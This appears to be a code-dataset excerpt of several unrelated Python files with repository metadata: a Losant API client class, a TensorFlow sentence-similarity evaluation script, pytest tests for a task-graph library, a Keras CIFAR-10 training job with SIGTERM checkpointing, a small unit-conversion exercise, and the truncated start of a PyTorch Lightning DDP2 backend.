path = "/instances/{instanceId}/members/{userId}".format(**path_params)
return self.client.request("PATCH", path, params=query_params, headers=headers, body=body)
| 41.244565
| 119
| 0.646594
|
import json
class InstanceMember(object):
def __init__(self, client):
self.client = client
def delete(self, **kwargs):
query_params = {"_actions": "false", "_links": "true", "_embedded": "true"}
path_params = {}
headers = {}
body = None
if "instanceId" in kwargs:
path_params["instanceId"] = kwargs["instanceId"]
if "userId" in kwargs:
path_params["userId"] = kwargs["userId"]
if "losantdomain" in kwargs:
headers["losantdomain"] = kwargs["losantdomain"]
if "_actions" in kwargs:
query_params["_actions"] = kwargs["_actions"]
if "_links" in kwargs:
query_params["_links"] = kwargs["_links"]
if "_embedded" in kwargs:
query_params["_embedded"] = kwargs["_embedded"]
path = "/instances/{instanceId}/members/{userId}".format(**path_params)
return self.client.request("DELETE", path, params=query_params, headers=headers, body=body)
def get(self, **kwargs):
query_params = {"_actions": "false", "_links": "true", "_embedded": "true"}
path_params = {}
headers = {}
body = None
if "instanceId" in kwargs:
path_params["instanceId"] = kwargs["instanceId"]
if "userId" in kwargs:
path_params["userId"] = kwargs["userId"]
if "losantdomain" in kwargs:
headers["losantdomain"] = kwargs["losantdomain"]
if "_actions" in kwargs:
query_params["_actions"] = kwargs["_actions"]
if "_links" in kwargs:
query_params["_links"] = kwargs["_links"]
if "_embedded" in kwargs:
query_params["_embedded"] = kwargs["_embedded"]
path = "/instances/{instanceId}/members/{userId}".format(**path_params)
return self.client.request("GET", path, params=query_params, headers=headers, body=body)
def patch(self, **kwargs):
query_params = {"_actions": "false", "_links": "true", "_embedded": "true"}
path_params = {}
headers = {}
body = None
if "instanceId" in kwargs:
path_params["instanceId"] = kwargs["instanceId"]
if "userId" in kwargs:
path_params["userId"] = kwargs["userId"]
if "member" in kwargs:
body = kwargs["member"]
if "losantdomain" in kwargs:
headers["losantdomain"] = kwargs["losantdomain"]
if "_actions" in kwargs:
query_params["_actions"] = kwargs["_actions"]
if "_links" in kwargs:
query_params["_links"] = kwargs["_links"]
if "_embedded" in kwargs:
query_params["_embedded"] = kwargs["_embedded"]
path = "/instances/{instanceId}/members/{userId}".format(**path_params)
return self.client.request("PATCH", path, params=query_params, headers=headers, body=body)
| true
| true
|
1c40ba4a9a02a64d3a26fef8c84e71080aba1669
| 3,894
|
py
|
Python
|
similarity/eval_iter.py
|
jtraviesor/alfred-tf-trainer
|
9747d24bef418415a31abfe0c9982d2f1d9d8298
|
[
"MIT"
] | 3
|
2017-11-18T11:41:46.000Z
|
2020-02-13T19:22:28.000Z
|
similarity/eval_iter.py
|
jtraviesor/alfred-tf-trainer
|
9747d24bef418415a31abfe0c9982d2f1d9d8298
|
[
"MIT"
] | 4
|
2017-09-01T05:28:49.000Z
|
2017-11-20T05:27:49.000Z
|
similarity/eval_iter.py
|
jtraviesor/alfred-tf-trainer
|
9747d24bef418415a31abfe0c9982d2f1d9d8298
|
[
"MIT"
] | 1
|
2018-06-08T03:55:32.000Z
|
2018-06-08T03:55:32.000Z
|
#! /usr/bin/env python
import tensorflow as tf
import numpy as np
from input_helpers import InputHelper
from time import sleep
# Parameters
# ==================================================
run_id = 'runs/1503723018'
model_file = run_id + "/checkpoints/model-72000"
# Eval Parameters
tf.flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
tf.flags.DEFINE_string("checkpoint_dir", "", "Checkpoint directory from training run")
tf.flags.DEFINE_string("eval_filepath", "data/test3.tsv", "Evaluate on this data (Default: None)")
tf.flags.DEFINE_string("vocab_filepath", run_id + "/checkpoints/vocab", "Load training time vocabulary (Default: None)")
tf.flags.DEFINE_string("model", model_file, "Load trained model checkpoint (Default: None)")
# Misc Parameters
tf.flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
tf.flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
FLAGS = tf.flags.FLAGS
FLAGS._parse_flags()
print("\nParameters:")
for attr, value in sorted(FLAGS.__flags.items()):
print("{}={}".format(attr.upper(), value))
if FLAGS.eval_filepath is None or FLAGS.vocab_filepath is None or FLAGS.model is None:
print("Eval or Vocab filepaths are empty.")
exit()
print("\nRunning iterative evaluation...\n")
# Evaluation
# ==================================================
checkpoint_file = FLAGS.model
print(checkpoint_file)
graph = tf.Graph()
with graph.as_default():
sess = tf.Session()
with sess.as_default():
# Load the saved meta graph and restore variables
saver = tf.train.import_meta_graph("{}.meta".format(checkpoint_file))
init = tf.global_variables_initializer()
sess.run(init)
saver.restore(sess, checkpoint_file)
inpH = InputHelper()
vocab_processor = inpH.restore_vocabulary_processor(FLAGS.vocab_filepath)
# Get the placeholders from the graph by name
input_x1 = graph.get_operation_by_name("input_x1").outputs[0]
input_x1_lens = graph.get_operation_by_name("input_x1_lens").outputs[0]
input_x2 = graph.get_operation_by_name("input_x2").outputs[0]
input_x2_lens = graph.get_operation_by_name("input_x2_lens").outputs[0]
input_y = graph.get_operation_by_name("input_y").outputs[0]
# Tensors we want to evaluate
dropout_keep_prob = graph.get_operation_by_name("dropout_keep_prob").outputs[0]
predictions = graph.get_operation_by_name("output/Softmax").outputs[0]
def get_lengths(x_batch):
def compute_size(x):
last_index = None
for i, e in enumerate(x):
                if e != 0:
last_index = i
return len(x) if last_index is None else last_index + 1
return [compute_size(x) for x in x_batch]
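        # e.g. compute_size([5, 3, 0, 0]) returns 2 (length up to the last
        # nonzero id), while an all-zero (fully padded) row falls back to
        # the full padded length.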
def get_feed_dict(x1_dev_b, x2_dev_b, y_dev_b):
return {
input_x1: x1_dev_b,
input_x1_lens: get_lengths(x1_dev_b),
input_x2: x2_dev_b,
input_x2_lens: get_lengths(x2_dev_b),
input_y: y_dev_b,
dropout_keep_prob: 1.0
}
while True:
s1 = input("S1 >")
s2 = input("S2 >")
x1_test = np.asarray(list(vocab_processor.transform(np.asarray([s1]))))
x2_test = np.asarray(list(vocab_processor.transform(np.asarray([s2]))))
y_test = np.asarray([0.0, 1.0])
            # FIXME: batch size used to be fixed to 64 in the input placeholders
x1_test = np.tile(x1_test, (64, 1))
x2_test = np.tile(x2_test, (64, 1))
y_test = np.tile(y_test, (64, 1))
batch_predictions = sess.run([predictions], get_feed_dict(x1_test, x2_test, y_test))
print("Prediction:", batch_predictions[0][0][1])
| 40.14433
| 120
| 0.638418
|
import tensorflow as tf
import numpy as np
from input_helpers import InputHelper
from time import sleep
run_id = 'runs/1503723018'
model_file = run_id + "/checkpoints/model-72000"
tf.flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
tf.flags.DEFINE_string("checkpoint_dir", "", "Checkpoint directory from training run")
tf.flags.DEFINE_string("eval_filepath", "data/test3.tsv", "Evaluate on this data (Default: None)")
tf.flags.DEFINE_string("vocab_filepath", run_id + "/checkpoints/vocab", "Load training time vocabulary (Default: None)")
tf.flags.DEFINE_string("model", model_file, "Load trained model checkpoint (Default: None)")
tf.flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
tf.flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
FLAGS = tf.flags.FLAGS
FLAGS._parse_flags()
print("\nParameters:")
for attr, value in sorted(FLAGS.__flags.items()):
print("{}={}".format(attr.upper(), value))
if FLAGS.eval_filepath is None or FLAGS.vocab_filepath is None or FLAGS.model is None:
print("Eval or Vocab filepaths are empty.")
exit()
print("\nRunning iterative evaluation...\n")
checkpoint_file = FLAGS.model
print(checkpoint_file)
graph = tf.Graph()
with graph.as_default():
sess = tf.Session()
with sess.as_default():
saver = tf.train.import_meta_graph("{}.meta".format(checkpoint_file))
init = tf.global_variables_initializer()
sess.run(init)
saver.restore(sess, checkpoint_file)
inpH = InputHelper()
vocab_processor = inpH.restore_vocabulary_processor(FLAGS.vocab_filepath)
input_x1 = graph.get_operation_by_name("input_x1").outputs[0]
input_x1_lens = graph.get_operation_by_name("input_x1_lens").outputs[0]
input_x2 = graph.get_operation_by_name("input_x2").outputs[0]
input_x2_lens = graph.get_operation_by_name("input_x2_lens").outputs[0]
input_y = graph.get_operation_by_name("input_y").outputs[0]
dropout_keep_prob = graph.get_operation_by_name("dropout_keep_prob").outputs[0]
predictions = graph.get_operation_by_name("output/Softmax").outputs[0]
def get_lengths(x_batch):
def compute_size(x):
last_index = None
for i, e in enumerate(x):
                if e != 0:
last_index = i
return len(x) if last_index is None else last_index + 1
return [compute_size(x) for x in x_batch]
def get_feed_dict(x1_dev_b, x2_dev_b, y_dev_b):
return {
input_x1: x1_dev_b,
input_x1_lens: get_lengths(x1_dev_b),
input_x2: x2_dev_b,
input_x2_lens: get_lengths(x2_dev_b),
input_y: y_dev_b,
dropout_keep_prob: 1.0
}
while True:
s1 = input("S1 >")
s2 = input("S2 >")
x1_test = np.asarray(list(vocab_processor.transform(np.asarray([s1]))))
x2_test = np.asarray(list(vocab_processor.transform(np.asarray([s2]))))
y_test = np.asarray([0.0, 1.0])
x1_test = np.tile(x1_test, (64, 1))
x2_test = np.tile(x2_test, (64, 1))
y_test = np.tile(y_test, (64, 1))
batch_predictions = sess.run([predictions], get_feed_dict(x1_test, x2_test, y_test))
print("Prediction:", batch_predictions[0][0][1])
| true
| true
|
1c40bb05eba11a640cfaf481908902a09ba25371
| 4,534
|
py
|
Python
|
tests/unit_tests/test_core/test_pin_node.py
|
henzh/piniverse
|
77dce494cefc9e8051bb32298a5b32e2397c1634
|
[
"MIT"
] | null | null | null |
tests/unit_tests/test_core/test_pin_node.py
|
henzh/piniverse
|
77dce494cefc9e8051bb32298a5b32e2397c1634
|
[
"MIT"
] | 1
|
2019-11-11T00:25:44.000Z
|
2019-11-11T00:25:44.000Z
|
tests/unit_tests/test_core/test_pin_node.py
|
henzh/piniverse
|
77dce494cefc9e8051bb32298a5b32e2397c1634
|
[
"MIT"
] | null | null | null |
# The MIT License (MIT)
#
# Copyright (c) 2019 Henry Zhao
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import pytest
import inspect
from piniverse.core.pin_node import PinNode, PinGraph
from piniverse.common.exceptions.pin_exception import PinException
from tests.unit_tests.test_core.my_package.my_file import foo, another_foo
def test_pin_node():
pin_node_1 = PinNode('1', '2', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=foo)
assert '1' == pin_node_1.task
assert '2' == pin_node_1.toward
assert '3' == pin_node_1.arguments['args'][0]
assert '5' == pin_node_1.arguments['kwargs']['4']
assert foo == pin_node_1.function
argspecs_1 = pin_node_1.argspecs()
assert [] == argspecs_1['args']
assert not argspecs_1['varargs']
assert not argspecs_1['varkw']
assert not argspecs_1['defaults']
assert [] == argspecs_1['kwonlyargs']
assert not argspecs_1['kwonlydefaults']
assert '{}' == argspecs_1['annotations']
pin_node_2 = PinNode('2', '2', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=another_foo)
assert '2' == pin_node_2.task
assert '2' == pin_node_2.toward
assert '3' == pin_node_2.arguments['args'][0]
assert '5' == pin_node_2.arguments['kwargs']['4']
assert another_foo == pin_node_2.function
argspecs = PinNode.parse(inspect.getfullargspec(foo))
assert [] == argspecs['args']
assert not argspecs['varargs']
assert not argspecs['varkw']
assert not argspecs['defaults']
assert [] == argspecs['kwonlyargs']
assert not argspecs['kwonlydefaults']
assert '{}' == argspecs['annotations']
argspecs_2 = pin_node_2.argspecs()
assert [] == argspecs_2['args']
assert not argspecs_2['varargs']
assert not argspecs_2['varkw']
assert not argspecs_2['defaults']
assert [] == argspecs_2['kwonlyargs']
assert not argspecs_2['kwonlydefaults']
assert '{}' == argspecs_2['annotations']
def test_pin_graph():
parents = {'1': '1', '2': '1', '3': '2', '4': '4', '5': '4'}
assert '1' == PinGraph.find(parents, '1')
assert '1' == PinGraph.find(parents, '2')
assert '1' == PinGraph.find(parents, '3')
assert '4' == PinGraph.find(parents, '4')
assert '4' == PinGraph.find(parents, '5')
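    # find() chases parent links to the set root: '3' -> '2' -> '1' above, so
    # tasks 1-3 share root '1' while tasks 4 and 5 share root '4'.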
pin_node_1 = PinNode('1', '2', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=foo)
pin_node_2 = PinNode('2', '1', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=another_foo)
pin_nodes = [pin_node_1, pin_node_2]
with pytest.raises(PinException) as e:
PinGraph.union(pin_nodes)
assert 'Found a cyclic dependency: 1, 2' == str(e.value) or 'Found a cyclic dependency: 2, 1' == str(e.value)
pin_node_1 = PinNode('1', '2', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=foo)
pin_node_2 = PinNode('2', None, arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=another_foo)
pin_nodes = [pin_node_1, pin_node_2]
parents = PinGraph.union(pin_nodes)
assert '1' == parents['1']
assert '1' == parents['2']
dag = PinGraph.topological_sort(pin_nodes)
assert foo == next(
filter(lambda pin_node: pin_node.task == '1', dag)).function
assert another_foo == next(
filter(lambda pin_node: pin_node.task == '2', dag)).function
dag = PinGraph(pin_nodes).dag
assert foo == next(
filter(lambda pin_node: pin_node.task == '1', dag)).function
assert another_foo == next(
filter(lambda pin_node: pin_node.task == '2', dag)).function
| 42.373832
| 113
| 0.671592
|
import pytest
import inspect
from piniverse.core.pin_node import PinNode, PinGraph
from piniverse.common.exceptions.pin_exception import PinException
from tests.unit_tests.test_core.my_package.my_file import foo, another_foo
def test_pin_node():
pin_node_1 = PinNode('1', '2', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=foo)
assert '1' == pin_node_1.task
assert '2' == pin_node_1.toward
assert '3' == pin_node_1.arguments['args'][0]
assert '5' == pin_node_1.arguments['kwargs']['4']
assert foo == pin_node_1.function
argspecs_1 = pin_node_1.argspecs()
assert [] == argspecs_1['args']
assert not argspecs_1['varargs']
assert not argspecs_1['varkw']
assert not argspecs_1['defaults']
assert [] == argspecs_1['kwonlyargs']
assert not argspecs_1['kwonlydefaults']
assert '{}' == argspecs_1['annotations']
pin_node_2 = PinNode('2', '2', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=another_foo)
assert '2' == pin_node_2.task
assert '2' == pin_node_2.toward
assert '3' == pin_node_2.arguments['args'][0]
assert '5' == pin_node_2.arguments['kwargs']['4']
assert another_foo == pin_node_2.function
argspecs = PinNode.parse(inspect.getfullargspec(foo))
assert [] == argspecs['args']
assert not argspecs['varargs']
assert not argspecs['varkw']
assert not argspecs['defaults']
assert [] == argspecs['kwonlyargs']
assert not argspecs['kwonlydefaults']
assert '{}' == argspecs['annotations']
argspecs_2 = pin_node_2.argspecs()
assert [] == argspecs_2['args']
assert not argspecs_2['varargs']
assert not argspecs_2['varkw']
assert not argspecs_2['defaults']
assert [] == argspecs_2['kwonlyargs']
assert not argspecs_2['kwonlydefaults']
assert '{}' == argspecs_2['annotations']
def test_pin_graph():
parents = {'1': '1', '2': '1', '3': '2', '4': '4', '5': '4'}
assert '1' == PinGraph.find(parents, '1')
assert '1' == PinGraph.find(parents, '2')
assert '1' == PinGraph.find(parents, '3')
assert '4' == PinGraph.find(parents, '4')
assert '4' == PinGraph.find(parents, '5')
pin_node_1 = PinNode('1', '2', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=foo)
pin_node_2 = PinNode('2', '1', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=another_foo)
pin_nodes = [pin_node_1, pin_node_2]
with pytest.raises(PinException) as e:
PinGraph.union(pin_nodes)
assert 'Found a cyclic dependency: 1, 2' == str(e.value) or 'Found a cyclic dependency: 2, 1' == str(e.value)
pin_node_1 = PinNode('1', '2', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=foo)
pin_node_2 = PinNode('2', None, arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=another_foo)
pin_nodes = [pin_node_1, pin_node_2]
parents = PinGraph.union(pin_nodes)
assert '1' == parents['1']
assert '1' == parents['2']
dag = PinGraph.topological_sort(pin_nodes)
assert foo == next(
filter(lambda pin_node: pin_node.task == '1', dag)).function
assert another_foo == next(
filter(lambda pin_node: pin_node.task == '2', dag)).function
dag = PinGraph(pin_nodes).dag
assert foo == next(
filter(lambda pin_node: pin_node.task == '1', dag)).function
assert another_foo == next(
filter(lambda pin_node: pin_node.task == '2', dag)).function
| true
| true
|
1c40bb46c037ce1e6e7e93b3825f8451e5627eab
| 7,024
|
py
|
Python
|
examples/pwr_run/checkpointing/nonpc_short/knn/job12.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
examples/pwr_run/checkpointing/nonpc_short/knn/job12.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
examples/pwr_run/checkpointing/nonpc_short/knn/job12.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
"""
#Trains a ResNet on the CIFAR10 dataset.
"""
from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras.callbacks import ReduceLROnPlateau, TensorBoard
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import cifar10
from keras.applications.vgg16 import VGG16
from keras.applications.vgg19 import VGG19
from keras import models, layers, optimizers
from datetime import datetime
import tensorflow as tf
import numpy as np
import os
import pdb
import sys
import argparse
import time
import signal
import glob
import json
import send_signal
parser = argparse.ArgumentParser(description='Tensorflow Cifar10 Training')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='specific testcase name')
parser.add_argument('--resume', dest='resume', action='store_true', help='if True, resume training from a checkpoint')
parser.add_argument('--gpu_num', metavar='GPU_NUMBER', type=str, help='select which gpu to use')
parser.add_argument('--node', metavar='HOST_NODE', type=str, help='node of the host (scheduler)')
parser.set_defaults(resume=False)
args = parser.parse_args()
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu_num
# Training parameters
batch_size = 256
args_lr = 0.003
args_model = 'vgg16'
epoch_begin_time = 0
job_name = sys.argv[0].split('.')[0]
save_files = '/scratch/li.baol/checkpoint_knn/' + job_name + '*'
total_epochs = 18
starting_epoch = 0
# first step is to update the PID
pid_dict = {}
with open('pid_lock.json', 'r') as fp:
pid_dict = json.load(fp)
pid_dict[job_name] = os.getpid()
json_file = json.dumps(pid_dict)
with open('pid_lock.json', 'w') as fp:
fp.write(json_file)
os.rename('pid_lock.json', 'pid.json')
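# The rename from pid_lock.json to pid.json is atomic on POSIX filesystems,
# so a reader of pid.json (presumably the scheduler) never observes a
# half-written file.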
if args.resume:
save_file = glob.glob(save_files)[0]
# epochs = int(save_file.split('/')[4].split('_')[1].split('.')[0])
starting_epoch = int(save_file.split('/')[4].split('.')[0].split('_')[-1])
data_augmentation = True
num_classes = 10
# Subtracting pixel mean improves accuracy
subtract_pixel_mean = True
n = 3
# Model name, depth and version
model_type = args.tc #'P100_resnet50_he_256_1'
# Load the CIFAR10 data.
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
# Normalize data.
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
# If subtract pixel mean is enabled
if subtract_pixel_mean:
x_train_mean = np.mean(x_train, axis=0)
x_train -= x_train_mean
x_test -= x_train_mean
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
print('y_train shape:', y_train.shape)
# Convert class vectors to binary class matrices.
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
if args.resume:
print('resume from checkpoint')
model = keras.models.load_model(save_file)
else:
print('train from start')
model = models.Sequential()
if '16' in args_model:
base_model = VGG16(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
elif '19' in args_model:
base_model = VGG19(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
#base_model.summary()
#pdb.set_trace()
model.add(base_model)
model.add(layers.Flatten())
model.add(layers.BatchNormalization())
model.add(layers.Dense(128, activation='relu'))#, kernel_initializer='he_uniform'))
#model.add(layers.Dropout(0.2))
model.add(layers.BatchNormalization())
model.add(layers.Dense(64, activation='relu'))#, kernel_initializer='he_uniform'))
#model.add(layers.Dropout(0.2))
model.add(layers.BatchNormalization())
model.add(layers.Dense(10, activation='softmax'))#, kernel_initializer='he_uniform'))
model.compile(loss='categorical_crossentropy',
optimizer=Adam(lr=args_lr),
metrics=['accuracy'])
#model.summary()
print(model_type)
#pdb.set_trace()
current_epoch = 0
################### connects interrupt signal to the process #####################
def terminateProcess(signalNumber, frame):
# first record the wasted epoch time
global epoch_begin_time
if epoch_begin_time == 0:
epoch_waste_time = 0
else:
epoch_waste_time = int(time.time() - epoch_begin_time)
epoch_waste_dict = {}
with open('epoch_waste.json', 'r') as fp:
epoch_waste_dict = json.load(fp)
epoch_waste_dict[job_name] += epoch_waste_time
json_file3 = json.dumps(epoch_waste_dict)
with open('epoch_waste.json', 'w') as fp:
fp.write(json_file3)
print('checkpointing the model triggered by kill -15 signal')
# delete whatever checkpoint that already exists
for f in glob.glob(save_files):
os.remove(f)
model.save('/scratch/li.baol/checkpoint_knn/' + job_name + '_' + str(current_epoch) + '.h5')
print ('(SIGTERM) terminating the process')
checkpoint_dict = {}
with open('checkpoint.json', 'r') as fp:
checkpoint_dict = json.load(fp)
checkpoint_dict[job_name] = 1
json_file3 = json.dumps(checkpoint_dict)
with open('checkpoint.json', 'w') as fp:
fp.write(json_file3)
sys.exit()
signal.signal(signal.SIGTERM, terminateProcess)
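# From here on, kill -15 (SIGTERM) routes into terminateProcess, which
# records the wasted partial-epoch time and checkpoints the model.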
#################################################################################
logdir = '/scratch/li.baol/tsrbrd_log/job_runs/' + model_type + '/' + job_name
tensorboard_callback = TensorBoard(log_dir=logdir)#, update_freq='batch')
class PrintEpoch(keras.callbacks.Callback):
def on_epoch_begin(self, epoch, logs=None):
global current_epoch
#remaining_epochs = epochs - epoch
current_epoch = epoch
print('current epoch ' + str(current_epoch))
global epoch_begin_time
epoch_begin_time = time.time()
my_callback = PrintEpoch()
callbacks = [tensorboard_callback, my_callback]
#[checkpoint, lr_reducer, lr_scheduler, tensorboard_callback]
# Run training
# send signal to indicate checkpoint is qualified
message = job_name + ' ckpt_qual'
send_signal.send(args.node, 10002, message)
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=round(total_epochs/2),
validation_data=(x_test, y_test),
shuffle=True,
callbacks=callbacks,
initial_epoch=starting_epoch,
verbose=1
)
# Score trained model.
scores = model.evaluate(x_test, y_test, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
# send signal to indicate job has finished
message = job_name + ' finish'
send_signal.send(args.node, 10002, message)
| 31.217778
| 118
| 0.703303
|
from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras.callbacks import ReduceLROnPlateau, TensorBoard
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import cifar10
from keras.applications.vgg16 import VGG16
from keras.applications.vgg19 import VGG19
from keras import models, layers, optimizers
from datetime import datetime
import tensorflow as tf
import numpy as np
import os
import pdb
import sys
import argparse
import time
import signal
import glob
import json
import send_signal
parser = argparse.ArgumentParser(description='Tensorflow Cifar10 Training')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='specific testcase name')
parser.add_argument('--resume', dest='resume', action='store_true', help='if True, resume training from a checkpoint')
parser.add_argument('--gpu_num', metavar='GPU_NUMBER', type=str, help='select which gpu to use')
parser.add_argument('--node', metavar='HOST_NODE', type=str, help='node of the host (scheduler)')
parser.set_defaults(resume=False)
args = parser.parse_args()
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu_num
batch_size = 256
args_lr = 0.003
args_model = 'vgg16'
epoch_begin_time = 0
job_name = sys.argv[0].split('.')[0]
save_files = '/scratch/li.baol/checkpoint_knn/' + job_name + '*'
total_epochs = 18
starting_epoch = 0
pid_dict = {}
with open('pid_lock.json', 'r') as fp:
pid_dict = json.load(fp)
pid_dict[job_name] = os.getpid()
json_file = json.dumps(pid_dict)
with open('pid_lock.json', 'w') as fp:
fp.write(json_file)
os.rename('pid_lock.json', 'pid.json')
if args.resume:
save_file = glob.glob(save_files)[0]
starting_epoch = int(save_file.split('/')[4].split('.')[0].split('_')[-1])
data_augmentation = True
num_classes = 10
subtract_pixel_mean = True
n = 3
model_type = args.tc
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
if subtract_pixel_mean:
x_train_mean = np.mean(x_train, axis=0)
x_train -= x_train_mean
x_test -= x_train_mean
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
print('y_train shape:', y_train.shape)
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
if args.resume:
print('resume from checkpoint')
model = keras.models.load_model(save_file)
else:
print('train from start')
model = models.Sequential()
if '16' in args_model:
base_model = VGG16(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
elif '19' in args_model:
base_model = VGG19(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
model.add(base_model)
model.add(layers.Flatten())
model.add(layers.BatchNormalization())
model.add(layers.Dense(128, activation='relu'))
model.add(layers.BatchNormalization())
model.add(layers.Dense(64, activation='relu'))
model.add(layers.BatchNormalization())
model.add(layers.Dense(10, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=Adam(lr=args_lr),
metrics=['accuracy'])
print(model_type)
current_epoch = 0
| true
| true
|
1c40bbef9d0c743ca08be761b688558d1d2052cb
| 294
|
py
|
Python
|
zadanie5.py
|
djdanto/Python100
|
524188233a966b12cf6bdfb9c14cf6bf25bf5205
|
[
"MIT"
] | null | null | null |
zadanie5.py
|
djdanto/Python100
|
524188233a966b12cf6bdfb9c14cf6bf25bf5205
|
[
"MIT"
] | null | null | null |
zadanie5.py
|
djdanto/Python100
|
524188233a966b12cf6bdfb9c14cf6bf25bf5205
|
[
"MIT"
] | null | null | null |
celsiusz = float(input('Enter the temperature in degrees Celsius: '))
fahrenheit = (celsiusz * 1.8) + 32
print('%0.1f Celsius = %0.1f Fahrenheit' % (celsiusz, fahrenheit))
kw = float(input('Enter the power in kilowatts: '))
kM = kw * 1.36
print('%0.1f kW = %0.1f KM' % (kw, kM))
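# Sanity check of the conversion factor used above (1 kW is approximately
# 1.36 metric horsepower): an input of 100 kW prints '100.0 kW = 136.0 KM'.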
| 26.727273
| 74
| 0.639456
|
celsiusz = float(input('Enter the temperature in degrees Celsius: '))
fahrenheit = (celsiusz * 1.8) + 32
print('%0.1f Celsius = %0.1f Fahrenheit' % (celsiusz, fahrenheit))
kw = float(input('Enter the power in kilowatts: '))
kM = kw * 1.36
print('%0.1f kW = %0.1f KM' % (kw, kM))
| true
| true
|
1c40bcbda0e67afd5b32077d733c0afca144bac1
| 6,871
|
py
|
Python
|
pytorch_lightning/accelerators/ddp2_backend.py
|
willprice/pytorch-lightning
|
94bba4059ce3dc13799d0fd59592f3bcfbbf19c4
|
[
"Apache-2.0"
] | null | null | null |
pytorch_lightning/accelerators/ddp2_backend.py
|
willprice/pytorch-lightning
|
94bba4059ce3dc13799d0fd59592f3bcfbbf19c4
|
[
"Apache-2.0"
] | null | null | null |
pytorch_lightning/accelerators/ddp2_backend.py
|
willprice/pytorch-lightning
|
94bba4059ce3dc13799d0fd59592f3bcfbbf19c4
|
[
"Apache-2.0"
] | null | null | null |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
import os
import torch
from pytorch_lightning import _logger as log
from pytorch_lightning.utilities import AMPType
from pytorch_lightning.utilities.distributed import rank_zero_only
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.core.step_result import Result
from pytorch_lightning.accelerators.base_backend import Accelerator
try:
from hydra.utils import to_absolute_path, get_original_cwd
from hydra.core.hydra_config import HydraConfig
except ImportError:
HYDRA_AVAILABLE = False
else:
HYDRA_AVAILABLE = True
try:
